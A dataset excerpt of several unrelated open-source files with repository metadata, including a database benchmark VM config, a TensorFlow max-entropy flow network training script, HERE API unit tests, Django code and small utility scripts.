bc4b797ce75320ec275ba50b7afce28607e27cee | d951d8c7350caf61f9dfe655e8a1a1ef49ec4a07 | /vagrant_files/generator/files/databases/blueflood_cl1_rf1.py | 0ca0de818889385b81763bf19fb873c358559e53 | [
"Apache-2.0"
] | permissive | TSDBBench/Overlord | 9e73d022a732e3a3ef0ec6e83059b3d117579c61 | d72b6927ceaf6631f5b07f411e34bec9904158c4 | refs/heads/master | 2020-04-11T08:05:32.384466 | 2019-07-14T15:50:10 | 2019-07-14T15:50:10 | 50,924,051 | 7 | 6 | null | 2017-11-27T11:34:51 | 2016-02-02T13:57:02 | Python | UTF-8 | Python | false | false | 6,363 | py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
__author__ = 'Andreas Bader'
__version__ = "0.01"
# db_folders -> List of DB Folder (for space check)
# db_client -> name of ycsb client
# db_args -> special ycsb arguments for this db
# db_name -> name of this db (e.g. for workload file)
# db_desc -> more detailed name/description
# jvm_args -> special jvm_args for this db and ycsb
# prerun_once -> list of commands to run local once before ycsb (%%IP%% uses first db vm) (without ycsb, sync or space diff or poweroff commands!)
# postrun_once -> list of commands to run local once after ycsb (%%IP%% uses first db vm) (without ycsb, sync or space diff or poweroff commands!)
# prerun -> list of commands to run before ycsb (all vms or local) (without ycsb, sync or space diff or poweroff commands!)
# postrun -> list of commands to run after ycsb (all vms or local) (without ycsb, sync or space diff or poweroff commands!)
# prerun_master -> list of commands to run before ycsb (only on master(first=ID 0) vm or local)) (without ycsb, sync or space diff or poweroff commands!)
# postrun_master -> list of commands to run after ycsb (only on master(first=ID 0) vm or local)) (without ycsb, sync or space diff or poweroff commands!)
# prerun_slaves -> list of commands to run before ycsb (only on slave (all without master(=ID 0)) vms or local)) (without ycsb, sync or space diff or poweroff commands!)
# postrun_slaves -> list of commands to run after ycsb (only on slave (all without master(=ID 0)) vms or local)) (without ycsb, sync or space diff or poweroff commands!)
# prerun_dict -> list of commands to run before ycsb for each db vm (key=number of vm) (without ycsb, sync or space diff or poweroff commands!) (%%SSH%% not needed)
# postrun_dict -> list of commands to run after ycsb for each db vm (key=number of vm) (without ycsb, sync or space diff or poweroff commands!) (%%SSH%% not needed)
# check -> list of commands to run after prerun (all vms or local) for checking if everything runs correctly (systemctl start xyz oftern returns true even if start failed somehow. Check that here!)
# check_master -> list of commands to run after prerun (all vms or local) for checking if everything runs correctly (only on master(first=ID 0) vm or local))
# check_slaves -> list of commands to run after prerun (all vms or local) for checking if everything runs correctly (all without master(=ID 0)) vms or local))
# check_dict -> list of commands to run after prerun for each db vm (key=number of vm) (without ycsb, sync or space diff or poweroff commands!) (%%SSH%% not needed)
# basic -> True/False, if True this is a basic database, so no need to ssh for space checking
# sequence -> which vm should be provisioned first? (for all postrun/prerun dicts/lists. First number is considered master db vm, rest are slaves.)
# include -> which base modules should be imported and added to the dictionary (standard functions that are reusable). Warning: infinite import loop possible!
# the following variables are possible in prerun_once, postrun_once, prerun, prerun_master, prerun_slaves, check, check_master, check_slaves, postrun, postrun_master, postrun_slaves, prerun_dict, postrun_dict, check_dict, db_args:
# %%IP%% -> IP of (actual) db vm
# %%IPgen%% -> IP of (actual) generator vm (on which this script runs)
# %%IPn%% -> IP of db vm number n (e.g. %%IP2%%)
# %%IPall%% -> give String with IP of all vms)
# %%HN%% -> Hostname of (actual) db vm
# %%HNgen%% -> Hostname of (actual) generator vm (on which this script runs)
# %%HNn%% -> Hostname of db vm number n (e.g. %%HN2%%)
# %%HNall%% -> give String with Hostname of all vms)
# %%SSH%% -> if SSH should be used (set at the beginning)
# Order of Preruns/Postruns:
# 1. prerun/postrun/check, 2. prerun_master/postrun_master/check_master, 3. preun_skaves/postrun_slaves/check_slaves, 4.prerun_dict/postrun_dict/check_dict
# General Order:
# prerun -> check -> ycsb -> postrun
def getDict():
dbConfig={}
dbConfig["db_folders"]=["/var/lib/cassandra"]
dbConfig["db_client"]="blueflood"
dbConfig["db_args"]="-p ip=%%IP%% -p ingestPort=19000 -p queryPort=19001"
dbConfig["db_name"]="blueflood_cl1_rf1"
dbConfig["db_desc"]="Blueflood with Cassandra together on 1 VM."
dbConfig["jvm_args"]="-jvm-args='-Xmx4096m'"
dbConfig["prerun_once"]= []
dbConfig["postrun_once"]= []
dbConfig["prerun"]= ["%%SSH%%sudo -s bash -c 'sed -i \"s|- seeds: \\\\\"127.0.0.1\\\\\"|- seeds: \\\\\"%%IP0%%\\\\\"|g\" /etc/cassandra/cassandra.yaml'",
"%%SSH%%sudo -s bash -c 'sed -i \"s|listen_address: localhost|listen_address: %%IP%%|g\" /etc/cassandra/cassandra.yaml'",
"%%SSH%%sudo -s bash -c 'sed -i \"s|rpc_address: localhost|rpc_address: %%IP%%|g\" /etc/cassandra/cassandra.yaml'",
"%%SSH%%sudo -s bash -c 'sed -i \"s|localhost|%%IP%%|g\" /home/vagrant/blueflood.conf'"]
dbConfig["postrun"]= []
dbConfig["prerun_master"]= ["%%SSH%%sudo -s bash -c 'systemctl start cassandra.service'",
"%%SSH%%sudo -s bash -c 'sleep 60'",
"%%SSH%%sudo -s bash -c 'cassandra-cli -h %%IP%% -f /home/vagrant/files/blueflood_cassandra.cli'",
"%%SSH%%sudo -s bash -c 'sleep 5'",
"%%SSH%%sudo -s bash -c 'systemctl start blueflood.service'",
"%%SSH%%sudo -s bash -c 'sleep 5'"]
dbConfig["postrun_master"]= []
dbConfig["prerun_slaves"]= []
dbConfig["postrun_slaves"]= []
dbConfig["prerun_dict"]= {}
dbConfig["postrun_dict"]= {}
dbConfig["check"]= []
dbConfig["check_master"]= ["%%SSH%%sudo -s bash -c 'exit $(systemctl status cassandra.service | grep -c \"active (exited)\")'",
"%%SSH%%sudo -s bash -c 'exit $(($(systemctl status cassandra.service | grep -c \"active (running)\")-1))'",
"%%SSH%%sudo -s bash -c 'exit $(systemctl status blueflood.service | grep -c \"active (exited)\")'",
"%%SSH%%sudo -s bash -c 'exit $(($(systemctl status blueflood.service | grep -c \"active (running)\")-1))'"]
dbConfig["check_slaves"]= []
dbConfig["check_dict"]= {}
dbConfig["basic"]= False
dbConfig["sequence"]=[0]
dbConfig["include"] = []
return dbConfig | [
"Development@Geekparadise.de"
] | Development@Geekparadise.de |
3859fc5a3b03eb2dfd040e427911496d4abbaaf1 | 009d22a0747066c265305440f135d5c429aeffe3 | /src/constants.py | d232ecdcdf765e6ba3b81f9e3dfe68600c7991e5 | [] | no_license | ekeimaja/Helikopteripeli | 936ab005a7fcf4eb5bcad296d3cdb7bb49cac837 | f3baad8b5832e74649cdc4d0a29378925afc4e2e | refs/heads/master | 2020-04-14T13:42:45.015920 | 2019-01-02T20:04:08 | 2019-01-02T20:04:08 | 163,876,587 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 399 | py | # Size of the window
SCREEN_WIDTH = 1200
SCREEN_HEIGHT = 800
# Title
TITLE = "Helikopteripeli"
# Default friction used for sprites, unless otherwise specified
DEFAULT_FRICTION = 0.2
# Default mass used for sprites
DEFAULT_MASS = 1
# Gravity
GRAVITY = (0.0, -900.0)
# Player forces
SPEED = 700
# Grid-size
SPRITE_SIZE = 64
# How close we get to the edge before scrolling
VIEWPORT_MARGIN = 100
| [
"ekeimaja@gmail.com"
] | ekeimaja@gmail.com |
33d564ecf9223da57b4dcd6e298a319deba53c72 | 7686153caa2fa89945e7371730e495f7892fa098 | /10k/parser.py | 7de5f2247de7041affde5a9ea13655c6bd0163e3 | [] | no_license | kellbot/raceresults | 1c88fd913c6e514f606f04c028209d6af699d488 | db1fac0c4a2639721e6944e125e2817522bf9441 | refs/heads/master | 2021-01-25T06:36:33.330837 | 2015-01-15T14:49:10 | 2015-01-15T14:49:10 | 29,168,273 | 0 | 1 | null | 2015-01-14T21:25:56 | 2015-01-13T02:16:09 | Python | UTF-8 | Python | false | false | 673 | py | import csv
from lxml import html
import glob
import os
os.chdir('C:/Users/kellb_000/Dropbox/Hacks/Racedata/Philly10k/')
for filename in glob.glob("*.html"):
file = open(filename)
filestring = file.read()
tree = html.fromstring(filestring)
table = tree.xpath('//table[@class="results_table"]/tbody/tr')
data = list()
for row in table:
data.append([c.text_content() for c in row.getchildren()])
letter = filename[:-5]
csvfile = "C:/Users/kellb_000/Dropbox/Hacks/Racedata/Philly10k/" + letter + ".csv"
with open(csvfile, "w") as output:
writer = csv.writer(output, lineterminator='\n')
writer.writerows(data)
| [
"kellbot@gmail.com"
] | kellbot@gmail.com |
65e8c6a127e9108978754864f271acc452e47fae | 19ee9842a574b805625bd0b1f9c32c6fe13757b4 | /vgg_real_nvp_augL.py | 7a864f4c4e0144b714da15552152c5dd03f529ea | [] | no_license | gabloa/max_ent_flow_nets | cb58b21d79c3708fbe8d619f1242dc03ed8e50df | 0036440df54651de558575e7a279379040e3f1e0 | refs/heads/master | 2020-03-27T08:28:59.860834 | 2018-08-27T07:01:22 | 2018-08-27T07:01:22 | 146,259,118 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,740 | py |
# coding: utf-8
# ## MEFN with real-nvp as generative model and gramian of vgg as penalty
#
# * Note: You will need to download a pre-trained vgg network from, for example https://github.com/ry/tensorflow-vgg16/raw/master/vgg16-20160129.tfmodel.torrent, then set the vgg_path
#
# * Seems that VGG network is tailored to 224 x 224 x 3 images so for now we will just stick to that size
#
# * code for building penalty with vgg network is based on paper https://arxiv.org/abs/1603.03417, code from https://github.com/ProofByConstruction/texture-networks
#
# * code for model real-nvp is based on paper https://arxiv.org/abs/1605.08803, code from https://github.com/taesung89/real-nvp
#
# * Warning: This code is extremely slow on CPU (really slow), mostly a proof-of-concept.
import os
import sys
import time
import json
import argparse
import pickle
import numpy as np
import tensorflow as tf
sys.path.append('vgg')
sys.path.append('real_nvp')
import real_nvp.nn as real_nvp_nn # for adam optimizer
from real_nvp.model import model_spec as real_nvp_model_spec # transforming image to latent
from real_nvp.model import inv_model_jac_spec as real_nvp_inv_model_spec # transforming latent to image
from vgg.vgg_network import VGGNetwork # read vgg network and compute style and content loss
from vgg.network_helpers import load_image
#import matplotlib
#import matplotlib.pylab as plt
#get_ipython().magic(u'matplotlib inline')
#-----------------------------
# command line argument, not all of them are useful
parser = argparse.ArgumentParser()
# data I/O
parser.add_argument('-i', '--style_img_path', type=str, default='img/style.jpg', help='path for the style image')
parser.add_argument('--vgg_path', type=str, default='vgg/vgg16.tfmodel', help='path for vgg network')
parser.add_argument('-o', '--save_dir', type=str, default='/tmp/pxpp/save', help='Location for parameter checkpoints and samples')
#parser.add_argument('-d', '--data_set', type=str, default='cifar', help='Can be either cifar|imagenet')
parser.add_argument('-t', '--save_interval', type=int, default=100, help='Every how many epochs to write checkpoint/samples?')
#parser.add_argument('-r', '--load_params', type=int, default=0, help='Restore training from previous model checkpoint? 1 = Yes, 0 = No')
# optimization
parser.add_argument('--entropy', type=int, default=1, help='0 = No entropy, 1 = Decreasing penalty, -1 = Constant penalty')
parser.add_argument('-l', '--learning_rate', type=float, default=0.01, help='Base learning rate')
#parser.add_argument('-e', '--lr_decay', type=float, default=0.999995, help='Learning rate decay, applied every step of the optimization')
parser.add_argument('-b', '--batch_size', type=int, default=12, help='Batch size during training per GPU')
parser.add_argument('-a', '--init_batch_size', type=int, default=100, help='How much data to use for data-dependent initialization.')
#parser.add_argument('-p', '--dropout_p', type=float, default=0.5, help='Dropout strength (i.e. 1 - keep_prob). 0 = No dropout, higher = more dropout.')
parser.add_argument('-x', '--max_iter', type=int, default=500, help='How many epochs to run in total?')
parser.add_argument('--lam_use', type=float, default=0.99, help='lambda value when --entropy=-1')
#parser.add_argument('-g', '--nr_gpu', type=int, default=1, help='How many GPUs to distribute the training across?')
# evaluation
#parser.add_argument('--sample_batch_size', type=int, default=16, help='How many images to process in paralell during sampling?')
# reproducibility
parser.add_argument('-s', '--seed', type=int, default=1, help='Random seed to use')
# * Put the right image path to style_img_path
# * Put the downloaded vgg model to vgg_path
args = parser.parse_args()
#args = parser.parse_args(["--style_img_path=img/style.jpg",
# "--vgg_path=vgg/vgg16.tfmodel",
# "--save_dir=checkpoints", "--max_iter=200",
# "--save_interval=20", "--batch_size=1"])
print('input args:\n', json.dumps(vars(args), indent=4, separators=(',',':'))) # pretty print args
if not os.path.exists(args.save_dir):
os.makedirs(args.save_dir)
pickle.dump({'args':args}, open("%s/args.save"%args.save_dir, "wb"), 0)
#--------------------------------------------
# ## Set up the real-nvp generative model
rng = np.random.RandomState(args.seed)
tf.set_random_seed(args.seed)
obs_shape = (224,224,3) # size of the image to use
model_spec = real_nvp_model_spec
inv_model_spec = real_nvp_inv_model_spec
nn = real_nvp_nn
# create the model
model = tf.make_template('model', model_spec)
inv_model = tf.make_template('model', inv_model_spec, unique_name_='model')
# run once for data dependent initialization of parameters
z_init = tf.placeholder(tf.float32, shape=(args.init_batch_size,) + obs_shape)
gen_par = model(z_init)
#----------------------------------------------
# ## Use vgg network to set up the style loss
style_img_path = args.style_img_path
texture_image = tf.to_float(tf.constant(load_image(style_img_path).reshape((1, 224, 224, 3))))
z_sample = tf.placeholder(tf.float32, shape = (args.batch_size,) + obs_shape)
x, inv_jac = inv_model(z_sample)
image_vgg = VGGNetwork("image_vgg", tf.concat(0, [texture_image, x, x]),
1, args.batch_size, args.batch_size, args.vgg_path)
# constraint loss
con_loss_vec = image_vgg.style_loss([(i, 1) for i in range(1, 6)])
con_loss = tf.reduce_mean(con_loss_vec)
con_loss1 = tf.reduce_mean(con_loss_vec[:int(args.batch_size / 2)])
con_loss2 = tf.reduce_mean(con_loss_vec[int(args.batch_size / 2):])
#--------------------------------------
# ## Final loss is a combination of entropy and cost
# compute entropy
entropy = tf.reduce_mean(inv_jac) + tf.reduce_mean(tf.reduce_sum(z_sample ** 2 * 0.5 + np.log(2 * np.pi) * 0.5, [1,2,3]))
# loss is a combination of -entropy and constraint violation
c_augL = tf.placeholder(tf.float32, shape = [])
lam = tf.placeholder(tf.float32, shape = [])
cost = -entropy + lam * con_loss + c_augL / 2.0 * (con_loss ** 2)
# build the SGD optimizer
all_params = tf.trainable_variables()
cost_grad1 = tf.gradients(-entropy + lam * con_loss, all_params)
cost_grad2 = tf.gradients(con_loss1, all_params)
cost_grad = [i + c_augL * con_loss2 * j for i,j in zip(cost_grad1, cost_grad2)]
tf_lr = tf.placeholder(tf.float32, shape=[])
optimizer = nn.adam_updates(all_params, cost_grad, lr=tf_lr, mom1=0.95, mom2=0.9995)
#--------------------------------------
# ## Training
n_iter=0
ent_ls = []
con_ls = []
lam_use_ls = []
c_use_ls = []
initializer = tf.global_variables_initializer()
saver = tf.train.Saver()
print("Start training")
with tf.Session() as sess: # = tf.InteractiveSession()
sess.run(initializer) #, {z_init: np.random.normal(0.0, 1.0, (args.init_batch_size,) + obs_shape)})
feed_dict = { z_sample: np.random.normal(0.0, 1.0, (args.batch_size,) + obs_shape)}
hk = sess.run(con_loss, feed_dict)
c_use = 1e-9
gamma = 0.25
lam_use = 0.0
for i_augL in range(6):
print("augL iter %d, lam = %f, c = %f"%(i_augL, lam_use, c_use))
for i in range(args.max_iter):
feed_dict = { z_sample: np.random.normal(0.0, 1.0, (args.batch_size,) + obs_shape),
tf_lr:args.learning_rate, lam: lam_use, c_augL: c_use}
entropy_tmp, cost_con_tmp, _ = sess.run([entropy, con_loss, optimizer], feed_dict)
n_iter += 1
print("iter%d, entropy=%f, constraint=%f"%(n_iter, entropy_tmp, cost_con_tmp))
sys.stdout.flush()
con_ls.append(cost_con_tmp)
ent_ls.append(entropy_tmp)
lam_use_ls.append(lam_use)
c_use_ls.append(c_use)
if n_iter % args.save_interval == 0:
# ## save samples
x_sample_ls = []
for i_samp in range(10):
x_sample = sess.run(x, {z_sample: np.random.normal(0.0, 1.0, (args.batch_size,) + obs_shape)})
x_sample_ls.append(x_sample)
pickle.dump({'x_sample_ls':x_sample_ls}, open("%s/sample_%d.save"%(args.save_dir, n_iter), "wb"), 0)
saver.save(sess, "%s/params_%d.ckpt"%(args.save_dir, n_iter))
pickle.dump({'ent_ls': ent_ls, 'con_ls': con_ls, 'lam_use_ls': lam_use_ls}, open("%s/track.save"%args.save_dir , "wb"), 0)
#plt.imshow(x_sample[0,:,:,:], interpolation='none')
# updating
feed_dict = { z_sample: np.random.normal(0.0, 1.0, (args.batch_size,) + obs_shape)}
hk_new = sess.run(con_loss, feed_dict)
lam_use += c_use*hk_new
if np.linalg.norm(hk_new) > gamma*np.linalg.norm(hk):
c_use *= 4
hk = hk_new
| [
"noreply@github.com"
] | gabloa.noreply@github.com |
b7b81ee4c177b6e2d2700f4cd7c058e8943527a8 | 9e4f8dc4ca6ee60a30ab3138fa8a4787d7b20894 | /src/devng/adventofcode/day04/day04_test.py | 066e10e3aa86f8e8004e36cedaaf55f71f6c8818 | [] | no_license | devng/code-puzzles | 8eadbd454a73e97b22bae8449fb6f50d8f3a3e88 | 6052e5ec2b54a97a6a519ad08e11562be642b278 | refs/heads/master | 2021-01-10T12:00:59.211228 | 2020-04-20T19:04:41 | 2020-04-20T19:04:41 | 47,743,152 | 2 | 0 | null | 2015-12-17T12:40:45 | 2015-12-10T06:40:27 | Python | UTF-8 | Python | false | false | 833 | py | #!/usr/bin/env python
from day04 import *
import unittest
class Day04Test(unittest.TestCase):
def test_check_num(self):
b1 = check_num("abcdef", 609043)
self.assertTrue(b1)
b2 = check_num("abcdef", 609)
self.assertFalse(b2)
b3 = check_num("pqrstuv", 1048970)
self.assertTrue(b3)
b4 = check_num("pqrstuv", 104897)
self.assertFalse(b4)
b5 = check_num("iwrupvqb", 9958218, "000000")
self.assertTrue(b5)
def test_check_range(self):
n1 = check_range("abcdef", 609040, 609045)
self.assertEqual(n1, 609043)
n2 = check_range("abcdef")
self.assertEqual(n2, None)
n3 = check_range("iwrupvqb", 9958210, 10, "000000")
self.assertEqual(n3, 9958218)
if __name__ == "__main__":
unittest.main()
| [
"n.g.georgiev@gmail.com"
] | n.g.georgiev@gmail.com |
bea68a9dceb3f06bebb451ac472acfe6b03e99e5 | 8d4b737885446ccd40628d6a546a141d5e84e5b4 | /Topics/1_migrating_your_DNN_to_candle/migrated/cc_t29res.py | e70863dc52fe408f8b5d6d8a0220184510c86a3d | [
"MIT"
] | permissive | brettin/candle_tutorials | 3afabd6ba12a9ee2353bd5166d0d0278d79e28ef | 18315a41cf51cbcb267fb78a2e02ffe82d2fc42b | refs/heads/master | 2021-04-28T03:12:17.942290 | 2018-10-19T16:34:16 | 2018-10-19T16:34:16 | 122,134,363 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15 | py | ../cc_t29res.py | [
"rajeeja@gmail.com"
] | rajeeja@gmail.com |
2674d077dcd3e48cf5445537f600e6171777c48d | 3f7c4de996894d83f0e999ab9e60302be5ab195f | /tests/test_fleet_telematics_api.py | 08355ed115f5e5d2e7b808128cec81a2981e98ee | [
"MIT"
] | permissive | tungson-pm/HerePy | 3f18ffddd181434c63f94abe67844c0fcb02747d | a9e2797f251ff157cf89cfae7c1605833bfee75f | refs/heads/master | 2022-12-25T06:08:21.880054 | 2020-10-05T19:54:51 | 2020-10-05T19:54:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,376 | py | #!/usr/bin/env python
import os
import time
import unittest
import json
import responses
import herepy
class FleetTelematicsApiTest(unittest.TestCase):
def setUp(self):
api = herepy.FleetTelematicsApi('api_key')
self._api = api
def test_initiation(self):
self.assertIsInstance(self._api, herepy.FleetTelematicsApi)
self.assertEqual(self._api._api_key, 'api_key')
self.assertEqual(self._api._base_url, 'https://wse.ls.hereapi.com/2/')
@responses.activate
def test_find_sequence_whensucceed(self):
with open('testdata/models/fleet_telematics_find_sequence.json', 'r') as f:
expected_response = f.read()
responses.add(responses.GET, 'https://wse.ls.hereapi.com/2/findsequence.json',
expected_response, status=200)
start = str.format('{0};{1},{2}', 'WiesbadenCentralStation', 50.0715, 8.2434)
intermediate_destinations = [str.format('{0};{1},{2}', 'FranfurtCentralStation', 50.1073, 8.6647),
str.format('{0};{1},{2}', 'DarmstadtCentralStation', 49.8728, 8.6326),
str.format('{0};{1},{2}', 'FrankfurtAirport', 50.0505, 8.5698)]
end = str.format('{0};{1},{2}', 'MainzCentralStation', 50.0021, 8.259)
modes = [herepy.RouteMode.fastest, herepy.RouteMode.car, herepy.RouteMode.traffic_enabled]
response = self._api.find_sequence(start=start,
departure='2014-12-09T09:30:00%2b01:00',
intermediate_destinations=intermediate_destinations,
end=end,
modes=modes)
self.assertTrue(response)
self.assertIsInstance(response, herepy.WaypointSequenceResponse)
@responses.activate
def test_find_sequence_whenerroroccured(self):
with open('testdata/models/fleet_telematics_unauthorized_error.json', 'r') as f:
expected_response = f.read()
responses.add(responses.GET, 'https://wse.ls.hereapi.com/2/findsequence.json',
expected_response, status=200)
start = str.format('{0};{1},{2}', 'WiesbadenCentralStation', 50.0715, 8.2434)
intermediate_destinations = [str.format('{0};{1},{2}', 'FranfurtCentralStation', 50.1073, 8.6647),
str.format('{0};{1},{2}', 'DarmstadtCentralStation', 49.8728, 8.6326),
str.format('{0};{1},{2}', 'FrankfurtAirport', 50.0505, 8.5698)]
end = str.format('{0};{1},{2}', 'MainzCentralStation', 50.0021, 8.259)
modes = [herepy.RouteMode.fastest, herepy.RouteMode.car, herepy.RouteMode.traffic_enabled]
with self.assertRaises(herepy.HEREError):
self._api.find_sequence(start=start,
departure='2014-12-09T09:30:00%2b01:00',
intermediate_destinations=intermediate_destinations,
end=end,
modes=modes)
@responses.activate
def test_find_pickups_whensucceed(self):
with open('testdata/models/fleet_telematics_find_pickups.json', 'r') as f:
expected_response = f.read()
responses.add(responses.GET, 'https://wse.ls.hereapi.com/2/findpickups.json',
expected_response, status=200)
modes = [herepy.RouteMode.fastest, herepy.RouteMode.car, herepy.RouteMode.traffic_enabled]
start = str.format('{0},{1};{2}:{3},value:{4}', 50.115620,
8.631210, herepy.MultiplePickupOfferType.pickup.__str__(),
'GRAPEFRUITS', 1000)
departure = '2016-10-14T07:30:00+02:00'
capacity = 10000
vehicle_cost = 0.29
driver_cost = 20
max_detour = 60
rest_times = 'disabled'
intermediate_destinations = [str.format('{0},{1};{2}:{3},value:{4}', 50.118578,
8.636551, herepy.MultiplePickupOfferType.drop.__str__(),
'APPLES', 30),
str.format('{0},{1};{2}:{3}', 50.122540, 8.631070,
herepy.MultiplePickupOfferType.pickup.__str__(), 'BANANAS')]
end = str.format('{1},{2}', 'MainzCentralStation', 50.132540, 8.649280)
response = self._api.find_pickups(modes=modes,
start=start,
departure=departure,
capacity=capacity,
vehicle_cost=vehicle_cost,
driver_cost=driver_cost,
max_detour=max_detour,
rest_times=rest_times,
intermediate_destinations=intermediate_destinations,
end=end)
self.assertTrue(response)
self.assertIsInstance(response, herepy.WaypointSequenceResponse)
@responses.activate
def test_find_pickups_whenerroroccured(self):
with open('testdata/models/fleet_telematics_unauthorized_error.json', 'r') as f:
expected_response = f.read()
responses.add(responses.GET, 'https://wse.ls.hereapi.com/2/findpickups.json',
expected_response, status=200)
modes = [herepy.RouteMode.fastest, herepy.RouteMode.car, herepy.RouteMode.traffic_enabled]
start = str.format('{0},{1};{2}:{3},value:{4}', 50.115620,
8.631210, herepy.MultiplePickupOfferType.pickup.__str__(),
'GRAPEFRUITS', 1000)
departure = '2016-10-14T07:30:00+02:00'
capacity = 10000
vehicle_cost = 0.29
driver_cost = 20
max_detour = 60
rest_times = 'disabled'
intermediate_destinations = [str.format('{0},{1};{2}:{3},value:{4}', 50.118578,
8.636551, herepy.MultiplePickupOfferType.drop.__str__(),
'APPLES', 30),
str.format('{0},{1};{2}:{3}', 50.122540, 8.631070,
herepy.MultiplePickupOfferType.pickup.__str__(), 'BANANAS')]
end = str.format('{1},{2}', 'MainzCentralStation', 50.132540, 8.649280)
with self.assertRaises(herepy.HEREError):
self._api.find_pickups(modes=modes,
start=start,
departure=departure,
capacity=capacity,
vehicle_cost=vehicle_cost,
driver_cost=driver_cost,
max_detour=max_detour,
rest_times=rest_times,
intermediate_destinations=intermediate_destinations,
end=end)
| [
"abdullahselek@gmail.com"
] | abdullahselek@gmail.com |
0f8cf966aae1157f8e50d5b1881785a10dc5234f | 0e828ab12c61d98e9c4b6d8418efe1f6130cf3db | /src/utilities/local/metadata_appender.py | 8665a65d8637bae82be5aed26a788f1f076eb990 | [] | no_license | chrisioa/sensiot_nsq | 60b220ad0bb4b4e70a60b90e6687119f9729a0e6 | df68cd8c4597654280f55edfd21ded9f0af085dd | refs/heads/master | 2020-04-20T06:12:08.016503 | 2019-02-01T15:59:45 | 2019-02-01T15:59:45 | 168,676,224 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,040 | py | import json
import logging
import os
import threading
from queue import Queue
from utilities.local.meta.data import SensorData
logger = logging.LoggerAdapter(logging.getLogger("sensiot"), {"class": os.path.basename(__file__)})
class MetaDataAppender(threading.Thread):
def __init__(self, name, event, input_queue, output_queue, config):
super(MetaDataAppender, self).__init__()
self.name = name
self.event = event
self.config = config
self.input_queue = input_queue
self.output_queue = output_queue
self.hostname = self.__get_hostname("/etc/hostname")
self.device_id = self.config['meta']['device_id']
self.building = self.config['location']['building']
self.room = self.config['location']['room']
logger.info("{} initialized successfully".format(self.name))
def run(self):
logger.info("Started {}".format(self.name))
while not self.event.is_set():
self.event.wait(2)
while not self.input_queue.empty():
raw = self.input_queue.get()
logger.info("Raw data received")
deserialized_data = json.loads(raw.replace("'", '"'))
converted_data = self.__convert(deserialized_data)
serialized_data = converted_data.to_json()
self.output_queue.put(serialized_data)
##### FUNCTION CALL HERE #####
logger.info("Data put in queue")
logger.info("Stopped: {}".format(self.name))
def __get_hostname(self, path):
if os.path.isfile(path):
with open(path) as file:
return file.readline().strip()
else:
logger.error("Unable to locate {} for hostname".format(path))
return "unspecified"
def __convert(self, data):
return SensorData(self.hostname,
self.device_id,
self.building,
self.room,
data)
| [
"christos.ioannidis@stud.uni-bamberg.de"
] | christos.ioannidis@stud.uni-bamberg.de |
5c9294596c8b7541d47e59cdd745759a227a0016 | 0fc891df6703ce3f91fe6005a6c582e573ed6c13 | /CWMT/user_login/migrations/0014_auto_20170811_1310.py | 95bd102bb078e1dc0a79ceb9075876bc60596027 | [] | no_license | Zeco-01/CWMT2017-REG | ce155343575d3b8b49eda584b40bdd1716368e38 | 5e71ddc38f3020d1582d0b38f2f8d0eace615b88 | refs/heads/master | 2021-01-02T22:19:25.372629 | 2017-09-18T06:46:11 | 2017-09-18T06:46:11 | 99,318,036 | 1 | 1 | null | 2017-08-11T15:17:24 | 2017-08-04T07:47:43 | Python | UTF-8 | Python | false | false | 568 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-08-11 13:10
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('user_login', '0013_auto_20170811_1306'),
]
operations = [
migrations.RemoveField(
model_name='user',
name='enter_date',
),
migrations.AddField(
model_name='user',
name='in_date',
field=models.CharField(max_length=100, null=True),
),
]
| [
"leezehua@outlook.com"
] | leezehua@outlook.com |
a85cc8cf2b49e89ca79b5d93c0af0d7e1dcec4ee | c55083d8a23a9d093b677066a5a827634c09357b | /chstrings/__init__.py | 39796432eff779705b6f260f03ae6661e1d07d2b | [
"MIT"
] | permissive | earwig/citationhunt | 211a44c7bdb67e675872ca44aeae982d33fcf359 | b6084d2958989c9082db7a8d4556a4e51b78bdb3 | refs/heads/master | 2021-01-15T16:11:11.563650 | 2016-07-21T11:08:43 | 2016-07-21T11:08:43 | 62,332,946 | 1 | 0 | null | 2016-06-30T18:16:46 | 2016-06-30T18:16:46 | null | UTF-8 | Python | false | false | 1,902 | py | import flask
import os
import json
def _preprocess_variables(config, strings):
in_page_link = flask.Markup(
'<a target="_blank" href=%s>%s</a>')
strings['in_page'] = \
flask.Markup(strings['in_page']) % in_page_link
if config.lead_section_policy_link:
lead_section_policy_link = flask.Markup(
'<a target="_blank" href=%s>%s</a>') % (
config.lead_section_policy_link,
config.lead_section_policy_link_title)
strings['lead_section_hint'] = \
flask.Markup(strings['lead_section_hint']) % \
lead_section_policy_link
else:
strings['lead_section_hint'] = ''
beginners_hint_link = flask.Markup(
'<a target="_blank" href=%s>%s</a>') % (
config.beginners_link,
config.beginners_link_title)
strings['beginners_hint'] = \
flask.Markup(strings['beginners_hint']) % beginners_hint_link
if '404' not in config.flagged_off:
page_not_found_link = flask.Markup('<a href=%s>Citation Hunt</a>') % (
config.lang_code)
strings['page_not_found_text'] = \
flask.Markup(strings['page_not_found_text']) % page_not_found_link
strings.setdefault('instructions_goal', '')
strings.setdefault('instructions_details', '')
if strings['instructions_details']:
strings['instructions_details'] = flask.Markup(
strings['instructions_details']) % (
flask.Markup('<b>' + strings['button_wikilink'] + '</b>'),
flask.Markup('<b>' + strings['button_next'] + '</b>'),
beginners_hint_link)
return strings
def get_localized_strings(config, lang_code):
strings_dir = os.path.dirname(__file__)
strings = json.load(file(os.path.join(strings_dir, lang_code + '.json')))
return _preprocess_variables(config, strings)
| [
"guilherme.p.gonc@gmail.com"
] | guilherme.p.gonc@gmail.com |
88947f254667961bbc58029408578caa53ee40e6 | ad2b21450f3e13fcc1a552b52cf16dc9c4667bf1 | /mysite/mysite/urls.py | d3d09581af7ddbde74a1462b6d0b8982dbdb0760 | [] | no_license | masummist/django- | dcdb9d29ac43be0369013999d3d5742d7a1218ff | e727941f74ca6ca0b8238bdc1bda96b4464b4587 | refs/heads/master | 2020-05-20T11:56:32.490328 | 2012-11-11T17:36:15 | 2012-11-11T17:36:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,199 | py | from django.conf.urls import *
from django.contrib import admin
##admin.autodiscover()
##from mysite.book import views
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
